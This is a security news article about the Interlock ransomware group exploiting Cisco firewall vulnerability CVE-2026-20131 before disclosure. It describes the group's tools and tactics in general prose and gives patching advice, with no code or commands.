Interlock Ransomware Campaign Exploited Cisco Firewall Vulnerability CVE-2026-20131 Weeks Before Disclosure
Published
Key Takeaways
- Zero-day exploitation: The Interlock ransomware campaign exploited the critical CVE-2026-20131 vulnerability weeks before public disclosure to compromise enterprise networks.
- Root access gained: This Cisco firewall exploit allows unauthenticated remote attackers to execute arbitrary Java code as root on affected devices.
- Sophisticated attack toolkit: Threat actors utilize custom remote access trojans and memory-resident webshells, escalating severe cybersecurity risks for targeted organizations.
An active Interlock ransomware campaign is leveraging a critical vulnerability in Cisco Secure Firewall Management Center software. The threat actors exploited the CVE-2026-20131 vulnerability as a zero-day beginning in January 2026, obtaining privileged access to enterprise networks more than a month before the official public disclosure, according to Amazon threat intelligence researchers.
The CVE-2026-20131 vulnerability, disclosed by Cisco on March 4, 2026, allows unauthenticated remote attackers to execute arbitrary Java code with root privileges.
Executing the Cisco Firewall Exploit
AWS noted observing request bodies that contained attempts to execute Java code and two embedded URLs with multiple variations across different exploit attempts: one to deliver configuration data supporting the exploit, and another to confirm successful exploitation “by causing a vulnerable target to perform an HTTP PUT request and upload a generated file.”
The AWS analysis linked the Interlock ransomware group to the exploit operation based on the execution of a malicious ELF binary and associated artifacts. Retrieving the binary revealed that the attacker-controlled server was used to distribute Interlock’s entire operational toolkit.
“The exposed infrastructure organized artifacts into separate paths corresponding to individual targets, with the same paths used for both downloading tools to compromised hosts and uploading operational artifacts back to the staging server,” the Amazon report said.
The operators employ automated PowerShell reconnaissance scripts to systematically enumerate victim environments, collecting hardware specifications, network configurations, and browser artifacts. They install custom remote access trojans (RATs) to establish encrypted WebSocket connections and enable arbitrary command execution.
Evading Detection and Escalating Cybersecurity Risks
The attackers use advanced infrastructure-laundering scripts, such as Bash scripts, that configure Linux servers as HTTP reverse proxies and automatically purge log files every 5 minutes. Additionally, the threat actors deploy memory-resident webshells and abuse legitimate tools (ConnectWise ScreenConnect, Volatility, Certify).
Arctic Wolf strongly recommends that customers use Cisco’s Software Checker to verify whether they are running an affected product and immediately apply security patches for Cisco Secure Firewall Management Center, implementing comprehensive defense-in-depth strategies to secure their infrastructure.
CVE-2026-20131 also affects Cisco Security Cloud Control (SCC) Firewall Management, Arctic Wolf noted, adding that Cisco has upgraded the service as part of routine maintenance, and no user action is required.
Interlock was suspected of attacks on the Kalamazoo Public Schools District and Wayne County last year.
Related
Get expert insights on threats, breaches, scams, and security trends — delivered every Monday.
Most Popular
Get expert insights on threats, breaches, scams, and security trends — delivered every Monday.
Most Popular